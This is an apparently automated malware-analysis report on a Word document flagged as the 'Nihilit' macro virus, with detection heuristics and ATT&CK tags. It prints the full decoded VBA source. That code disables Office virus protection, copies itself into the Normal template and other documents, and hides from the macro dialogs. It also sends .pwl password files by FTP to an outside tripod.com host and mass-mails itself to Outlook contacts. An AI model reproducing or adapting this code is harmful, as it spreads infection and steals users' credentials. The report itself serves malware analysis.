MALICIOUS
418
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
This document contains legacy WordBasic macro markers and critical VBA heuristics indicating the use of Shell() and CreateObject(), along with disabling security settings. The AutoClose macro attempts to infect other documents by exporting its VBA code to 'C:\Windows\Nihilit.drv' and then importing it into the NormalTemplate. It also attempts to steal passwords via FTP, though this functionality is truncated. The presence of legacy WordBasic markers and the specific infection method suggest a known, albeit older, malware pattern.
Heuristics 10
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
shell "ftp http://members.tripod.com/Nihilit/" -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.VirusProtection = False -
VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATIONVBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.Matched line in script
Set Ni_msg = Ni_OApp.CreateItem(0) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Ni_OApp = CreateObject("Outlook.Application") -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Ni_msg.Attachments.Add Environ("WINDIR") & "\Nihilit.doc" -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://m(emb��.�xpo�d.�j/DU/ In document text (OLE body)
- http://members.tripod.com/Nihilit/A@fIn document text (OLE body)
- http://members.tripod.com/Nihilit/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4369 bytes |
SHA-256: aaa5df437abd560f45f06ede4c707f67e9b535cceddf0bcdba400dcc9fd44039 |
|||
|
Detection
ClamAV:
Doc.Trojan.Hilite-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Nihilit"
Sub AutoClose()
On Error Resume Next
' Nihilit v2.0 by Necronomikon |[ShadowvX],[Devilport-Systems]
' thanks WalruS for code and help
Call Nihilit
End Sub
Sub Nihilit()
On Error Resume Next
With Options
.VirusProtection = False
.ConfirmConversions = False
.SaveNormalPrompt = False
End With
Application.DisplayAlerts = wdAlertsNone
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
ActiveDocument.ReadOnlyRecommended = False
If NormalTemplate.VBProject.VBComponents.Item("Nihilit").Name <> "Nihilit" Then
ActiveDocument.VBProject.VBComponents("Nihilit").Export ("C:\Windows\Nihilit.drv")
SetAttr "C:\Windows\Nihilit.drv", 6
End If
Call InfectDocument
If Month(Now) = Day(Now) Then Call Pwdstealer
NormalTemplate.Saved = True
End Sub
Sub InfectDocument()
On Error Resume Next
If ActiveDocument.VBProject.VBComponents.Item("Nihilit").Name <> "Nihilit" Then
ActiveDocument.VBProject.VBComponents.import ("C:\Windows\Nihilit.drv")
ActiveDocument.Save
End If
End Sub
Sub Pwdstealer()
On Error Resume Next
'thanks to Fallen Angel for this code!
With Application.FileSearch
.FileName = "*.pwl"
.LookIn = "c:"
.Execute
For i = 1 To .FoundFiles.Count
shell "ftp http://members.tripod.com/Nihilit/"
shell "nihilit"
shell "killer"
shell "post" & .FoundFiles(i)
shell "bye"
Next i
End With
End Sub
Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub
Sub ToolsSecurity()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = True
Dialogs(wdDialogToolsSecurity).Show
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub
Sub FileTemplates()
End Sub
Sub ToolsMacro()
Call Stealth
Dialogs(wdDialogToolsMacro).Display
End Sub
Sub ViewVBCode()
Call Stealth
ShowVisualBasicEditor = True
End Sub
Sub Stealth()
On Error Resume Next
Application.OrganizerDelete Source:=NormalTemplate.Name, _
Name:="Nihilit", Object:=wdOrganizerObjectProjectItems
Application.OrganizerDelete Source:=ActiveDocument.Name, _
Name:="Nihilit", Object:=wdOrganizerObjectProjectItems
NormalTemplate.Saved = True
ActiveDocument.Saved = True
End Sub
Sub HelpAbout()
WordBasic.FileNew
WordBasic.ToggleFull
WordBasic.DocMaximize
WordBasic.Font "Comic Sans MS"
WordBasic.FontSize 60
WordBasic.Bold
WordBasic.Insert "Check this!"
WordBasic.StartOfLine
WordBasic.CharRight 1, 1
WordBasic.FormatFont Points:="48", Color:=6
WordBasic.EndOfLine
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FontSize 48
WordBasic.Insert "Nihilit was coded by Necronomikon."
End Sub
Sub FileExit()
On Error Resume Next
Call Nihilit
If ActiveDocument.Saved = False Then
ActiveDocument.SaveAs FileName:="C:\Windows\Nihilit.doc", FileFormat:=wdFormatDocument
Set Ni_OApp = CreateObject("Outlook.Application")
Set Ni_Mapi = Ni_OApp.GetNameSpace("MAPI")
For Each Ni_AddList In Ni_Mapi.AddressLists
Next
End If
If Ni_AddList.AddressEntries.Count <> 0 Then
For Ni_AddListCount = 1 To Ni_AddList.AddressEntries.Count
Next
Set Ni_AddListEntry = Ni_AddList.AddressEntries(Ni_AddListCount)
Set Ni_msg = Ni_OApp.CreateItem(0)
Ni_msg.To = Ni_AddListEntry.Address
Ni_msg.Subject = "Check this!!!"
Ni_msg.Body = "I like this story!!!;o)." + vbCrLf + "Nihilit"
Ni_msg.Attachments.Add Environ("WINDIR") & "\Nihilit.doc"
Ni_msg.DeleteAfterSubmit = True
End If
If Ni_msg.To <> "" Then
Ni_msg.Send
End If
Application.Quit
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.